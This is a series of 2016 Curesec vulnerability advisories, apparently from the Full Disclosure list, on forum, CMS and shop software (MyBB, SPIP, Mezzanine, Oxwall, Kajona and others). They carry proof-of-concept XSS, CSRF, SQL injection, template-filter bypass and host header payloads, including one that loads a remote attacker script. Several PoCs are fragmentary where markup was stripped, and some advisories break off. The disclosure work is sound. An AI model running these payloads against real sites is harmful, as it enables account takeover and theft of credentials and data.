Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyLittleForum 2.3.6.1 Fixed in: 2.3.7beta Fixed Version Link: https://github.com/ilosuna/mylittleforum/releases/tag/ v2.3.7beta Vendor Website: http://mylittleforum.net/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to cross site request forgery. An attacker could exploit this issue to add new users or change the status of existing users to administrator if a victim visits a website containing a specifically crafted payload while logged into MyLittleForum. 3. Details CVSS: Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P Description: There is no CSRF protection, allowing an attacker to perform actions for a victim if the victim visits an attacker controlled website while logged in. Proof of Concept: Add New User: http://localhost/ mylittleforum-2.3.6.1/index.php" method="POST"> Make Existing User Admin: 4. Solution To mitigate this issue please upgrade at least to version 2.3.7beta: https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta Please note that a newer version might already be available. 5. Report Timeline 09/05/2015 Informed Vendor about Issue (no reply) 09/15/2015 Reminded Vendor of Disclosure Date 09/15/2015 Vendor replies 10/04/2015 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyLittleForum-2361-CSRF-176.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Mezzanine 4.2.0: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Mezzanine 4.2.0 Fixed in:4.2.1 Fixed Version Link: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 Vendor Website: http://mezzanine.jupo.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Mezzanine is an open source CMS written in python. In version 4.2.0, it is vulnerable to two persistent XSS attacks, one of which requires extended privileges, the other one does not. These issues allow an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details XSS 1: Persistent XSS via Name in Comments CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: When leaving a comment on a blog post, the author name is echoed unencoded in the backend, leading to persistent XSS. Proof of Concept: Leave a comment, as author name use '"> To trigger the payload, view the comment overview in the admin backend: http:// localhost:8000/admin/generic/threadedcomment XSS 2: Persistent XSS via HTML file upload CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N Description: When uploading files via the media manager, the extension .html is allowed, leading to XSS via file upload. An account with the permissions to upload files to the media manager is required. Proof of Concept: Visit the media manager and upload a .html file: http://localhost:8000/admin/ media-library/upload/?ot=desc&o=date As uploaded files are stored inside the web root, it can now be accessed, thus executing the JavaScript code it contains: http://localhost:8000/static/media/uploads/xss.html 4. Solution To mitigate this issue please upgrade at least to version 4.2.1: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/05/2016 Vendor replies 09/19/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SPIP 3.1: XSS & Host Header Injection
Security Advisory - Curesec Research Team 1. Introduction Affected SPIP 3.1 Product: Fixed in:3.1.2 / 3.0.23 Fixed Versionhttp://www.spip.net/en_download Link: Vendor Website: http://www.spip.net/ VulnerabilityReflected & Persistent XSS, Host Header Injection, httpOnly Type:Cookie disclosure Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 11/10/2016 public: Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview SPIP is a content management system written in PHP. In version 3.1, it is vulnerable to a persistent as well as reflected cross site scripting vulnerability as it allows users to enter URLs containing the JavaScript protocol, which an attacker can exploit to steal cookies, inject JavaScript keylogger, or bypass CSRF protection. Additionally, it contains a Host Header Injection which may lead to the leakage of password reset tokens and thus the compromisation of user accounts. Finally, the application discloses httpOnly cookies, making exploitation of XSS issues slightly easier. 3. Details Persistent XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: When posting a message in the internal Forum, user input is properly encoded, thus disallowing XSS. However, a hypertext link may be added as well, and there is no check on the protocol of the supplied link, which leads to an XSS vulnerability. Proof of Concept: 1. Create a new Message: http://localhost/spip/ecrire/?exec=forum&repondre=new 2. In the URL field enter: javascript:alert(1) 3. Post the Message To trigger the payload, a click on the link is required. Reflected XSS CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: When editing a private message, a redirect parameter may be submitted as well. This parameter decides to what page a user is returned if they were to press the back button. The value of this parameter is user controlled and may thus be used for phishing or XSS attacks. Proof of Concept: Visit: http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect= javascript:alert(1) Click on the Back button represented by the envelope icon. Host Header Injection CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N Description: The application takes the Host Header and uses it in a password reset email. As the Host Header is user-controlled, an attacker can set it to arbitrary values. In the case of a password reset page, this can lead to security issues as an attacker can request a password reset email for a user and set the Host header to a server they control. As this header is used in the email, a user would be send to the attackers server if they were to click on the link, leading to the leakage of the recovery token and thus the compromisation of the account. Proof of Concept: Request: POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1 Host: example.com Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6; wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/ x-www-form-urlencoded Content-Length: 199 page=spip_pass&lang=en& formulaire_action=oubli&formulaire_action_args= orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk &oubli=visitor%40example.com&nobot= Email Send: [My SPIP site] Forgotten password (this is an automated message) To recover your access to the site My SPIP site (http://localhost/spip) Please go to the following address: http:// example.com/spip/spip.php?page=spip_pass&p=107017475657c15ad6e9c781.23674073 You can then enter a new password and log in to the site. httpOnly Cookie Disclosure Description: The phpinfo page discloses httpOnly cookies such as session cookies, making it slightly easier to exploit XSS vulnerabilities. Proof of Concept: http://localhost/spip/ecrire/?exec=info 4. Solution To mitigate this issue please upgrade at least to version 3.1.2: http://www.spip.net/en_download Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/23/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/SPIP-31-XSS-amp-Host-Header-Injection-178.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyLittleForum 2.3.6.1: XSS & RPO
Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyLittleForum 2.3.6.1 Fixed in: 2.3.7beta Fixed Version Link: https://github.com/ilosuna/mylittleforum/releases/tag/ v2.3.7beta Vendor Website: http://mylittleforum.net/ Vulnerability Type: XSS & RPO Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to reflected cross site scripting as well as relative path overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection, and RPO may lead to CSS injection. 3. Details Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The username and email parameter of the add user page are vulnerable to reflected XSS. Proof of Concept: http://localhost/mylittleforum-2.3.6.1/index.php"; method="POST"> alert(1)" /> Relative Path Overwrite Description: Because the application includes CSS files relative instead of absolute, an attacker can overwrite the path. With some browsers, this may lead to CSS injection. Proof of Concept: http://localhost/mylittleforum-2.3.6.1/index.php?id=1 4. Solution To mitigate this issue please upgrade at least to version 2.3.7beta: https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta Please note that a newer version might already be available. 5. Report Timeline 09/05/2015 Informed Vendor about Issue (no reply) 09/15/2015 Reminded Vendor of Disclosure Date 09/15/2015 Vendor replies 10/04/2015 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyLittleForum-2361-XSS-amp-RPO-179.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyBB 1.8.6: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:MyBB 1.8.6
Fixed in:1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it contains various
XSS vulnerabilities, some of which are reflected and some of which are
persistent. Some of them depend on custom forum or server settings.
These issues may lead to the injection of JavaScript keyloggers, injection of
content such as ads, or the bypassing of CSRF protection, which would for
example allow the creation of a new admin user.
3. Details
XSS 1: Persistent XSS - Signature
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: The profile editor of the moderator control panel does not
properly encode the signature of a user when editing it. Because of this, a
user can create a specifically crafted signature and - once a moderator or
admin visits the profile editor for that user - the injected code will be
executed in the context of the victims browser.
Proof of Concept:
Visit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action=
editprofile&uid=[USER_ID] As signature, use:
XSS 2: Persistent XSS - Forum Post (depending on forum settings)
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: An admin can allow HTML input for specific forums via the setting
allowhtml. There are various filters in place which intend to make this safe,
which may leave the admin with the impression that it is indeed safe. However,
there are various possibilities to bypass these filters, mainly using HTML5
features.
Proof of Concept:
-> Visiting the post will trigger the code context menu -> A right-click
will trigger the code Enter something:
-> Input into the field will trigger the code -> A click on submit will trigger the code
There are various other attributes which may also work, such as onsearch,
onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such
as onMouseOver or onFocus are filtered out.
XSS 3: Persistent XSS - Username (depending on forum settings)
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description: The username is echoed unencoded in the user area. As the login
does not have CSRF protection and as an admin can be logged into the admin area
with a different account than the one they are logged into the forum, a
persistent XSS vulnerability in the user area can be exploited. However,
successful exploitation most likely requires a username length of at least 43
characters, which is more than the default settings allow.
Simple Proof of Concept:
1. register user with name f" onmouseover="alert(1)" b=" 2. login and visit
http://localhost/mybb_1805/Upload/usercp.php 3. hover over the avatar
The simple proof of concept can be improved to allow successful exploitation.
It is not required for the victim to hover over the avatar or interact with the
webpage in any way:
1. As username, use: f" onerror="alert(1)" b=" 2. Set an avatar, and use a URL
as source (not an image upload) 3. Delete the image from the remote host,
making it unavailable, thus triggering an error and executing the injected
code.
Possible Payloads:
Loading a script with vanilla javascript takes a lot more characters than are
allowed in a username by default:
"onerror="s=document.createElement('script');s.src='http://localhost/s.js';
document.getElementById('top').appendChild(s)"
As jQuery is loaded, this can be optimized:
"onerror="$.getScript('http://aa.bc/s.js')
Executing the payload for a victim:
The attack does not require the victim to not be logged in as normal user, as
one can login even when already logged in. The login as a normal user also does
not affect the login as admin. Thus, an attacker could use the following
payload to log a victim in and redirect them to the site containing the
payload:
http://localhost/mybb_1805/Upload/
member.php" target="myframe" id="myform" name="myform">http://localhost/s.js')" />document.myform.submit();
It will automatically log the victim in and redirect them to the page that
triggers the script execution. No action of the victim is required. The loaded
script could for example perform a backup of the database and then send the
attacker the name of the backup, as backups are stored in a public directory.
XSS 4: Persistent XSS - Post Attachment (depending on server settings)
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description: Attachments are uploaded to a public directory, and their
extension is changed to .attach. Files with extension .attach that contain HTML
code are interpreted as HTML files by some default server configurations (for
example Apache). Additionally, t
[FD] Oxwall 1.8.0: XSS & Open Redirect
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Oxwall 1.8.0 (build 9900)
Fixed in:1.8.2
Fixed Version Link: https://developers.oxwall.com/download
Vendor Website: http://www.oxwall.org/
Vulnerability Type: XSS & Open Redirect
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Oxwall is a social networking software written in PHP. In version 1.8.0, it is
vulnerable to multiple XSS attacks and a persistent open redirect.
The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.
3. Details
XSS 1: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
When performing a ping request, the method value is echoed unencoded, leading
to reflected XSS.
Proof of Concept:
http://localhost/oxwall-1.8.0/base/ping/index/"; method="POST">
","params":{}}]}" />
Code:
ow_system_plugins/base/controllers/ping.php
$responseStack[] = array(
'command' => $c['command'],
'result' => $event->getData()
);
}
echo json_encode(array(
'stack' => $responseStack
));
XSS 2: Persistent XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The name of a photo album is vulnerable to persistent XSS in two places: When
viewing a user profile, and after editing the album. Both of these are DOM
based XSS vulnerabilities, and both of these require some interaction of the
victim, eg hovering or clicking.
Proof of Concept:
0. Register an account
1. Create a new album with the name
'">
2. Visit the users profile:
http://localhost/oxwall-1.8.0/user/[username]
3. Hover over the image belonging to that album
An alternative to steps 2. and 3. is:
2. use CSRF to log the victim into the account with the injected album name
3. Use ClickJacking to get user to click "Edit Album" and then click "Done"
XSS 3: Self-XSS
CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
The chat window is vulnerable to self-XSS. It may be possible to exploit this
issue via ClickJacking in some browsers.
Proof of Concept:
Open a chat and paste the following into the text field (there is no need to
send it, although that would trigger the vulnerability again as well):
'">
Persistent Open Redirect
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The real name of a user is echoed inside meta tags without proper encoding.
Tags are stripped, which prevents an attacker from adding new tags, but it is
still possible to add additional attributes to the meta tag, leading to an open
redirect and potentially XSS in older browsers.
Proof of Concept:
1. Register a new user. As real name use:
5;URL=http://google.com/"; http-equiv="refresh" foo="
2. Visit the profile of that user:
http://localhost/oxwall-1.8.0/user/[username]
4. Solution
To mitigate this issue please upgrade at least to version 1.8.2.
Please note that a newer version might already be available.
5. Report Timeline
11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date
12/15/2015 Vendor requests more time
01/13/2016 Contacted Vendor, Vendor requests more time
02/01/2016 Contacted Vendor, Vendor requests more time
02/22/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Oxwall-180-XSS-amp-Open-Redirect-148.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyBB 1.8.6: Improper validation of data passed to eval
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:MyBB 1.8.6
Fixed in:1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: Improper validation of data passed to eval
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it improperly
validates templates that are passed to eval, allowing for the disclosure of the
database password. If the database is writable from remote, it may also lead to
code execution.
An admin account is required.
3. Details
Description
CVSS: Low 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N
MyBB allows an admin to edit templates. These templates can contain HTML, and
it is possible to read out the content of PHP variables as well as the
properties of objects. There are filters in place which should make it
impossible to call functions or to read out sensitive information such as
database credentials.
Templates are used as following:
eval('$variable = "'.$templates->get('templateName').'";');
$templates->get returns the template as saved in the database, with double
quotes and slashes escaped.
When saving a template, the template is passed to the check_template function
to check if it contains malicious content. The checks try to prevent the
reading of the database password as well as the calling of functions. This
means that none of the naive attempts to read out the database password - eg
$config['database']['password'], $config[database][password], or $config
["database"]["password"] - would work.
However, it is still possibly to read out the database password by setting the
value of an existing variable to "password" and using that variable when
reading out the password, thus bypassing the filter.
Proof of Concept
First, edit a template such as the usercp_profile_contact_fields_field template:
http://localhost/mybb_1806/Upload/admin/index.php?module=style-templates&action=edit_template&title=usercp_profile_contact_fields_field&sid=1&expand=15
Add this line at the beginning:
{$cfvalue}: {$config['database'][$cfvalue]}
Now, visit the profile:
http://localhost/mybb_1806/Upload/usercp.php?action=profile
As any of the "Additional Contact Information" values, use "password" to read
out the database password,
"hostname" to read out the hostname, and "username" to read out the user.
In case that the database is writable from remote, an attacker could now also
gain code execution, as check_template is applied when saving templates, not
when loading them. Example query:
UPDATE mybb_templates SET template="{${phpinfo()}}" WHERE title=
"usercp_profile_contact_fields_field";
Visiting the profile will execute the injected code.
Code
inc/config.php
$config['database']['password'] = '[THE_DATABASE_PASSWORD]';
admin/inc/functions.php
function check_template($template)
{
// Check to see if our database password is in the template
if(preg_match("#database'?\\s*\]\\s*\[\\s*'?password#", $template))
{
return true;
}
// System calls via backtick
if(preg_match('#\$\s*\{#', $template))
{
return true;
}
// Any other malicious acts?
// Courtesy of ZiNgA BuRgA
if(preg_match("~\\{\\$.+?\\}~s",
preg_replace('~\\{\\$+[a-zA-Z_][a-zA-Z_0-9]*((?:-\\>|\\:\\:)\\$*[a-zA-Z_][a-zA-Z_0-9]*|\\[\s*\\$*([\'"]?)[a-zA-Z_
0-9 ]+\\2\\]\s*)*\\}~', '', $template)))
{
return true;
}
return false;
}
usercp.php (as one example)
foreach(array('icq', 'aim', 'yahoo', 'skype', 'google') as $cfield)
{
$contact_fields[$cfield] = '';
$csetting = 'allow'.$cfield.'field';
if($mybb->settings[$csetting] == '')
{
continue;
}
if(!is_member($mybb->settings[$csetting]))
{
continue;
}
$cfieldsshow = true;
$lang_string = 'contact_field_'.$cfield;
$lang_string = $lang->{$lang_string};
$cfvalue = htmlspecialchars_uni($user[$cfield]);
eval('$contact_fields[$cfield] =
"'.$templates->get('usercp_profile_contact_fields_field').'";');
}
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Di
[FD] MyBB 1.8.6: SQL Injection
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:MyBB 1.8.6
Fixed in:1.8.7
Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip
Vendor Website: http://www.mybb.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 01/29/2016
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a
second order SQL injection by an authenticated admin user, allowing the
extraction of data from the database.
3. Details
Description
CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P
The setting threadsperpage is vulnerable to second order error based SQL
injection. An admin account is needed to change this setting.
The injection takes place into a LIMIT clause, and the query also uses ORDER
BY, making an injection of UNION ALL not possible, but it is still possibly to
extract information.
Proof of Concept
Go to the settings page:
http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7
For Setting "threadsperpage" use:
20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
Visit a forum to trigger injected code:
http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3
The result will be:
SQL Error:
1105 - XPATH syntax error: ':5.5.33-1'
Query:
SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username
AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON
(u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky
DESC, t.lastpost desc LIMIT 0, 20 procedure
analyse(extractvalue(rand(),concat(0x3a,version())),1);
Code
forumdisplay.php
$perpage = $mybb->settings['threadsperpage'];
[...]
$query = $db->query("
SELECT t.*, {$ratingadd}t.username AS threadusername, u.username
FROM ".TABLE_PREFIX."threads t
LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid)
WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2
$prefixsql2
ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow
$sortfield2
LIMIT $start, $perpage
");
4. Solution
To mitigate this issue please upgrade at least to version 1.8.7:
http://resources.mybb.com/downloads/mybb_1807.zip
Please note that a newer version might already be available.
5. Report Timeline
01/29/2016 Informed Vendor about Issue
02/26/2016 Vendor requests more time
03/11/2016 Vendor releases fix
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyBB 1.8.6: CSRF, Weak Hashing, Plaintext Passwords
Security Advisory - Curesec Research Team 1. Introduction Affected Product:MyBB 1.8.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.mybb.com/ Vulnerability Type: CSRF, Weak Hashing, Plaintext Passwords Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode:Full Disclosure / Informational CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using weak hashing, and sends passwords via email in plaintext. 3. Login CSRF Description CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N The login of MyBB does not have any CSRF protection. The impact of this is low, but a victim could provide sensitive information under a fake account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, a login CSRF makes it possible to exploit possible vulnerabilities in the user area, such as XSS. Proof of Concept http://localhost/mybb_1806/Upload/member.php"; method="POST"> http://localhost/mybb_1806/Upload/index.php"; /> 4. Weak Hashing Description MyBB uses md5 for hashing passwords, which is not considered secure. The hashing used is: $hash = md5(md5($salt).md5($password)); 5. Passwords Emailed in Plaintext Description When passwords are reset, the generated 8 character password is send to the user via email in plaintext. It is suggested that users change these passwords, but a change is not required. It is recommended to use a password reset token instead, and to force the user to create a new password themselves. 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases new version 03/15/2016 Requested information about unfixed issues 03/15/2016 Vendor considers issues minor and will not fix them for now 09/15/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyBB-186-CSRF-Weak-Hashing-Plaintext-Passwords-161.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Kajona 4.7: XSS & Directory Traversal
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Kajona 4.7
Fixed in:5.0
Fixed Version Link: https://www.kajona.de/en/Downloads/
downloads.get_kajona.html
Vendor Website: https://www.kajona.de/
Vulnerability Type: XSS & Directory Traversal
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable
to multiple XSS attacks and limited directory traversal.
The XSS vulnerabilities are reflected as well as persistent, and can lead to
the stealing of cookies, injection of keyloggers, or the bypassing of CSRF
protection.
The directory traversal issue gives information about which files exist on a
system, and thus allows an attacker to gather information about a system.
3. Details
XSS 1: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The function that parses admin requests echoes user input into a JavaScript
context without escaping, leading to reflected XSS. As the injection takes
place into a JavaScript context, browser filters will generally not be able to
filter out an attack.
In the case of Kajona, XSS may lead to code execution, as admins can upload PHP
files via the media manager.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo='
Code:
core/module_system/system/class_request_dispatcher.php
$strReturn = "";
XSS 2: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The media manager echoes the form_element parameter into a JavaScript context
without escaping, leading to reflected XSS. As the injection takes place into a
JavaScript context, browser filters will generally not be able to filter out an
attack. Note that a valid systemid id is required.
Proof of Concept:
http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['#
Click on "Accept" overlay of an image to trigger the injected code.
XSS 3: Reflected XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
The "class_messageprovider_exceptions_enabled" parameter of the xml.php script
is vulnerable to reflected XSS.
Proof of Concept:
http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<%2fa>&messageprovidertype=class_messageprovider_exceptions
XSS 4: Persistent XSS
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
When creating a comment, the subject is vulnerable to persistent XSS. The click
of an admin is required to execute the injected JavaScript code.
Proof of Concept:
1. Leave a comment:
http://localhost/kajona/index.php?page=postacomment
2. As subject, use:
');alert('1
3. Visit the comment overview:
http://localhost/kajona/index.php?admin=1&module=postacomment&action=list
4. Click edit on the comment
5. Click on "Edit Tags" (the second symbol from the right)
Directory Traversal
When viewing images, the file name is improperly sanitized, allowing for
directory traversal.
It is not possible to actually read out files, as there are additional checks
in place preventing that. But an unauthenticated attacker can still see which
files exist on a system and which do not, making it possible to collect
information for further attacks.
Proof of Concept:
GET
/kajona/image.php?image=/files/images/upload///////download.php&maxWidth=20&maxHeight=2
HTTP/1.1
-> 200 (but not shown)
GET
/kajona/image.php?image=/files/images/upload///////foobar.php&maxWidth=20&maxHeight=2
HTTP/1.1
-> 404
Code:
core/module_system/image.php
public function __construct() {
//find the params to use
$this->strFilename = urldecode(getGet("image"));
//avoid directory traversing
$this->strFilename = str_replace("../", "", $this->strFilename);
[...]
}
[...]
private function resizeImage() {
//Load the image-dimensions
if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename,
"/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) {
[...]
}
class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND);
class_response_object::getInstance()->sendHeaders();
}
4. Solution
To mitigate this issue please upgrade at least to version 5.0:
https://www.kajona.de/en/Downloads/downloads.get_kajona.html
Please note that a newer version might already be available.
5. Report Timeline
04/11/2016 Informed Vendor about Issue
04/13/2016 Vendor applies fix to github
05/25/2016 Vendor releases fixed version
09/15/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-T
[FD] Peel Shopping 8.0.2: Object Injection
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Peel Shopping 8.0.2
Fixed in:8.0.3
Fixed Version Link: www.peel-shopping.com
Vendor Website: www.peel-shopping.com
Vulnerability Type: Object Injection
Remote Exploitable: Yes
Reported to vendor: 04/11/2016
Disclosed to public: 09/15/2016
Release mode:Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is
vulnerable to Object Injection.
Peel Shopping stores a PHP object in a cookie, which is then unserialized when
received by the application. An attacker can send arbitrary PHP objects, and
has thus a limited influence on the control flow of the application. This can
for example lead to DOS attacks by creating an infinite loop.
3. Details
The last_views cookie is passed to unserialize, leading to Object Injection.
Authentication is not required.
